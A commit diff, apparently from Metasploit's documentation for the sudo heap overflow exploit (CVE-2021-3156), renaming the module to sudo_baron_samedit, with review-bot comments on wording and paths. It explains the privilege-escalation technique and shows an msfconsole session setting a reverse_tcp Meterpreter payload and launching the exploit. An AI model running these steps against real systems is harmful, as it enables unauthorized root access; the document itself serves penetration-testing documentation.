Implement feedback from PR review

This commit is contained in:
Spencer McIntyre
2021-02-04 09:25:40 -05:00
parent c33c08bae9
commit 7281d00938
3 changed files with 32 additions and 54 deletions
@@ -1,14 +1,14 @@
## Vulnerable Application
A heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker
to gain elevated privileges. The vulnerability was interested in July of 2011 and affects version 1.8.2
to gain elevated privileges. The vulnerability was introduced in July of 2011 and affects version 1.8.2
through 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this
implementation leverages the overflow to overwrite a `service_user` struct in memory to reference an attacker
controlled library which results in it being loaded with the elevated privileges held by sudo.
### Manual Target
The exploit requires a number of lengths / offsets to function correction. The manual target can be used to specify
The exploit requires a number of lengths / offsets to function correctly. The manual target can be used to specify
these values if they are known. To identify the values, use the `brute.sh` script from the original PoC repository at
[blasty/CVE-2021-3156][1].
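Review bot: the two wording fixes here ("interested" to "introduced", "function correction" to "function correctly") are right, but the reference-style link `[blasty/CVE-2021-3156][1]` depends on a `[1]:` definition that is outside this hunk; confirm it still exists in the file, otherwise the link renders as literal brackets. While touching this paragraph, "heap based buffer overflow" reads better hyphenated as "heap-based buffer overflow", and "lengths / offsets" as "lengths/offsets".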
@@ -41,7 +41,7 @@ Example steps in this format (is also in the PR):
1. Install the application
1. Start msfconsole
1. Do: `use exploit/linux/local/cve_2021_3156_sudo`
1. Do: `use exploit/linux/local/sudo_baron_samedit`
1. Set the necessary options (target, payload, etc.)
1. Do: `run`
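Review bot: the module path in the hunk context is now `exploit/linux/local/sudo_baron_samedit`, so the commit needs to rename the module file to match (the "3 changed files" summary suggests it does, but the docs and module path should be checked together, since a stale path here makes the documented `use` command fail). The context line "Example steps in this format (is also in the PR):" is leftover text from the module documentation template and should be dropped from the finished document.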
@@ -82,15 +82,15 @@ BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/cve_2021_3156_sudo
msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/sudo_baron_samedit
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3156_sudo) > set SESSION 1
msf6 exploit(linux/local/sudo_baron_samedit) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_3156_sudo) > set LHOST 192.168.159.128
msf6 exploit(linux/local/sudo_baron_samedit) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/local/cve_2021_3156_sudo) > set TARGET 1
msf6 exploit(linux/local/sudo_baron_samedit) > set TARGET 1
TARGET => 1
msf6 exploit(linux/local/cve_2021_3156_sudo) > exploit
msf6 exploit(linux/local/sudo_baron_samedit) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Executing automatic check (disable AutoCheck to override)
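Review bot: every `msf6 exploit(...)` prompt in the transcript was updated to `sudo_baron_samedit`, which is the consistent thing to do; a final search of the documentation for the old name `cve_2021_3156_sudo` would confirm nothing outside these three hunks still references it. The transcript also runs `set TARGET 1` without saying which target that index selects; given the Manual Target section states that target needs lengths/offsets, either name the target here or show any options it requires being set before `exploit`.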